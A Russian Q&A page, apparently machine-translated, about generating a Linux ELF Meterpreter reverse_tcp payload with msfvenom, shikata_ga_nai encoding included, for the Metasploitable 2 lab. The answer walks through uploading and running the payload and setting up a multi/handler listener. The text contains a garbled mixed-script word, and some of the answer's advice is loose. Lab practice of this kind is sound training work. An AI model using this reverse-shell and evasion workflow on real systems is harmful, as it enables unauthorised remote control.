Как использовать метод msfvenom elf для metasploitable 2?

Вопрос или проблема

Как использовать подход msfvenom elf для Metasploitable 2?

Я читаю книгу, которая учит, как создать исполняемый файл msfvenom для Windows. Но я учусь на Metasploitable 2. Я действительно не хотел пропускать этот раздел, не понимая его. Поэтому я взял еще 2 книги, но обе они также учат только подходу для Windows, искал в интернете, и похоже, что я нашел только способы для Windows exe. Так что я решил сделать это сам. Я сделал следующее.

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -e x86/shikata_ga_nai -f elf -o test.elf

Затем я получил оболочку и сделал

Upload test.elf test.elf 

Затем я запустил bash test.elf на машине, и ничего не произошло.

Я запустил file test.elf, и вот что я получил:

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size

Что я делаю не так?

После нескольких попыток немного подправить нагрузку. Безуспешно. Я переустановил Metasploitable 2.

Я снова сделал нагрузку так, как изначально планировалось.

Я запустил sudo ./test.elf на машине Metasploitable, и это сработало.

Я уже запускал sudo ./test.elf ранее, и он выдал мне ошибку “команда не найдена” на другой установке.

Теперь, пох看来, это работает. После создания нескольких нагрузок они все работают сейчас. Я предполагаю, что это была плохая установка, или я как-то испортил другую версию Metasploitable 2.

Ответ или решение

Использование Metasploit с Msfvenom для Metasploitable 2

Чтобы успешно использовать подход msfvenom elf на платформе Metasploitable 2, важно учитывать несколько ключевых аспектов. Ниже приведены пошаговые инструкции и рекомендации, которые помогут вам создать и запустить исполняемый ELF файл, используя msfvenom.

Шаг 1: Создание полезной нагрузки с Msfvenom

  1. Запуск команды msfvenom:
    Для создания полезной нагрузки используйте следующую команду:

    msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -e x86/shikata_ga_nai -f elf -o test.elf

    Здесь:

    • -a x86 указывает архитектуру.
    • --platform linux определяет целевую платформу.
    • -p linux/x86/meterpreter/reverse_tcp указывает тип полезной нагрузки.
    • LHOST и LPORT необходимо заменить на ваш внешний IP-адрес и порт, которые будут использоваться для обратного соединения.
    • -e x86/shikata_ga_nai указывает на использование обфускации полезной нагрузки, что помогает избежать обнаружения.
    • -f elf указывает на формат выходного файла.
    • -o test.elf задает имя выходного файла.
  2. Проверка на ошибки:
    После генерации полезной нагрузки убедитесь, что файл не поврежден. Используйте:

    file test.elf

    Это должно вернуть информацию о файле, подтверждая, что он распознается как исполняемый ELF файл.

Шаг 2: Загружайте файл на Metasploitable 2

  1. Скопируйте файл:
    Загрузите сгенерированный файл test.elf на машину Metasploitable 2. Это можно сделать с помощью SCP или любого другого метода передачи файлов.
    Например:
    scp test.elf user@metasploitable:/path/to/destination/

Шаг 3: Запуск исполняемого файла

  1. Дайте права на выполнение:
    Перед запуском убедитесь, что файл имеет права на выполнение:

    chmod +x test.elf
  2. Запуск файла:
    Запустите файл с помощью следующей команды:

    sudo ./test.elf

    Запуск с sudo может быть необходим, так как некоторые действия требуют повышенных привилегий.

Шаг 4: Настройка слушателя Metasploit

  1. Запуск Metasploit Framework:
    Откройте терминал и запустите:

    msfconsole
  2. Настройка слушателя:
    Установите необходимые настройки для обратного соединения, например:

    use exploit/multi/handler
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST xxx.xxx.xxx.xxx
    set LPORT xxxx
    exploit

Возможные проблемы и их решения

  • Ошибка файла: Если в выводе команды file test.elf вы видите сообщение о поврежденном заголовке секции, это может указывать на неправильную генерацию файла. Убедитесь, что команды выполнялись правильно и без ошибок.

  • Команда не найдена: Если получаете сообщение "command not found" при запуске, это может быть связано с неправильным путём к файлу или отсутствием прав на выполнение. Проверьте путь и примените права, как указано выше.

Заключение

Использование msfvenom с metasploitable 2 — это мощный метод изучения безопасности и эксплуатации уязвимостей. Следуя вышеизложенным шагам, вы сможете успешно создать и запустить полезную нагрузку ELF. Убедитесь, что ваша лаборатория безопасна и предназначена только для учебных целей.

Оцените материал
Добавить комментарий

Капча загружается...